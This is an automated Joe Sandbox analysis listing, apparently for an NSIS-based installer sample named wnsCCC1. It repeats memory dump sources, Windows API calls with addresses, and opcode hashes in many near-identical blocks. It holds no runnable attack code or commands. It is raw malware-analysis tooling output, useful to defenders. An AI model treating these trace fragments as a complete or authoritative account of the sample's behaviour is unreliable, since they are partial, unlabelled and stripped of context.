                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileWrite
                                                                                                                                                                                                              • String ID: timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this
                                                                                                                                                                                                              • API String ID: 3934441357-1897978588
                                                                                                                                                                                                              • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                                                                              • Instruction ID: 11bffb161eade2b6c2cb4bf4b25223a29cd6195b7324502744f40ed25e3c63a9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20E08C3220125BEBEF119E518C00AEBBB6CFB003A0F004432FD11E3180D234E9208BA8
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(?,?,0045A730,?,00405DDC,0045A730,0045A730,004D5000,?,74DF2EE0,00405B1A,?,004D5000,74DF2EE0,00000000), ref: 00405D76
                                                                                                                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                                                                                • Part of subcall function 0040591F: CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405962
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,004C9000,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1892508949-0
                                                                                                                                                                                                              • Opcode ID: 080c4fbc0bac1be490202287ae91035c68ce5d17b61444efa9045488ae083b02
                                                                                                                                                                                                              • Instruction ID: 7d59cd0ba42eeb9d64297a1bfc0940e3ae1e5cc226c4bbb5031ea1960038836b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 080c4fbc0bac1be490202287ae91035c68ce5d17b61444efa9045488ae083b02
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8811D031904510EBCF30AFA5CD4599E36A0EF15329B28493BFA45B22F1DB3E8D819A5D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00002000,00403576,00468240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(?,?,0045A730,?,00405DDC,0045A730,0045A730,004D5000,?,74DF2EE0,00405B1A,?,004D5000,74DF2EE0,00000000), ref: 00405D76
                                                                                                                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                                                                                                                              • lstrlenW.KERNEL32(0045A730,00000000,0045A730,0045A730,004D5000,?,74DF2EE0,00405B1A,?,004D5000,74DF2EE0,00000000), ref: 00405E1E
                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(0045A730,0045A730,0045A730,0045A730,0045A730,0045A730,00000000,0045A730,0045A730,004D5000,?,74DF2EE0,00405B1A,?,004D5000,74DF2EE0), ref: 00405E2E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3248276644-0
                                                                                                                                                                                                              • Opcode ID: c50f70bfe3bb78425b78202ba545a0a687f676b53d1ab77a34f5d173cef1449b
                                                                                                                                                                                                              • Instruction ID: 388cf340d0c034ef08ff27084220079457182ac4682ba574f5a4b5e3d5e6accd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c50f70bfe3bb78425b78202ba545a0a687f676b53d1ab77a34f5d173cef1449b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DFF0F43A005E1116D62233364D09BEF0948CE82314B1A853BFC91B22D2DB3C8A539DFE
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                                                              • Opcode ID: 8c309843f6b2f335838841955cb70ff663a93de2c7e640db2f5b87053db46705
                                                                                                                                                                                                              • Instruction ID: b0acf179c18152fd5568b60ba426e70b62ff0895eecaeb6bac654bfa50895d4e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c309843f6b2f335838841955cb70ff663a93de2c7e640db2f5b87053db46705
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD012832620210DFE7195B789D18B2A3798E710718F10467FF955F62F1EA78CC429B4D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                                                                                                                • Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                                                                                                                                • Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
                                                                                                                                                                                                                • Part of subcall function 00406752: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004067B8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2547128583-0
                                                                                                                                                                                                              • Opcode ID: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                                                                                                                              • Instruction ID: 7b80e99db610fb1a261844a57c40f0e669857592e3492eb3b2a0c0f7ce0b312d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14E086325042115BD21057745E48D3762AC9AC4704307843EF556F3041DB78DC35B66E
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000003,00402F73,004DD000,80000000,00000003), ref: 00405EE2
                                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$AttributesCreate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 415043291-0
                                                                                                                                                                                                              • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                                                                                                                              • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00405ABE,?,?,00000000,00405C94,?,?,?,?), ref: 00405EBE
                                                                                                                                                                                                              • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405ED2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                              • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                                                                                              • Instruction ID: 9f0be338fa0adf84d9e7c2e76c5bc37ea56a51acd28ddc8ab22a7b028afbcef4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13D01272504420AFC2502738EF0C89FBF95DB543717124B35FAE9A22F0CB304C568A98
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00403498,004D5000,004D5000,004D5000,004D5000,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 004059A2
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004059B0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1375471231-0
                                                                                                                                                                                                              • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                                                                                                                              • Instruction ID: 01a40f06620425e1c555583f7199589d3835b04f5715874dbca4219b9923c3a9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6C04C71216502DAF7115F31DF09B177A50AB60751F11843AA146E11A4DA349455D92D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CloseHandle.KERNEL32(FFFFFFFF,74DF3420,00403819,00000006,?,00000006,00000008,0000000A), ref: 004039F8
                                                                                                                                                                                                              • CloseHandle.KERNEL32(FFFFFFFF,74DF3420,00403819,00000006,?,00000006,00000008,0000000A), ref: 00403A0C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandle
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2962429428-0
                                                                                                                                                                                                              • Opcode ID: ffd8599462ce3f723ad4d03e4ae191cd570dcb1409c2afe1ca7b75f560b1f18d
                                                                                                                                                                                                              • Instruction ID: cd813d42a02bf8c0cac85f8aec853e45aa6acae4c29e822381722b559998feb2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ffd8599462ce3f723ad4d03e4ae191cd570dcb1409c2afe1ca7b75f560b1f18d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0AE08C35A4071496C520EF7CBD8D9853A286B813357208326F0BDF21F0C7389EA79EA9
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(0043E708,00402F08), ref: 004054AB
                                                                                                                                                                                                                • Part of subcall function 00405450: SetWindowTextW.USER32(0043E708,0043E708), ref: 004054BD
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                                                                                                                • Part of subcall function 004059D1: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0045E730,Error launching installer), ref: 004059FA
                                                                                                                                                                                                                • Part of subcall function 004059D1: CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?), ref: 00401F4D
                                                                                                                                                                                                                • Part of subcall function 00406873: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406884
                                                                                                                                                                                                                • Part of subcall function 00406873: GetExitCodeProcess.KERNELBASE(?,?), ref: 004068A6
                                                                                                                                                                                                                • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$CloseProcesslstrlen$ChangeCodeCreateExitFindHandleNotificationObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1543427666-0
                                                                                                                                                                                                              • Opcode ID: 1e17b9d0cd3dbac1f08edb0365c0efb45eeb9f6259674c83ab4016f25104067e
                                                                                                                                                                                                              • Instruction ID: acd8761c06f5a0ec48b5b4c4c323a9df4587fdbfc486ef5c68e798776a33b5ab
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e17b9d0cd3dbac1f08edb0365c0efb45eeb9f6259674c83ab4016f25104067e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 37F09632906011D7CB20FBA189485DE77A49F40318B24417BF501B21D1CB7C4D419A6E
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 004062AC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Create
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                                                                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                                                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                                                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
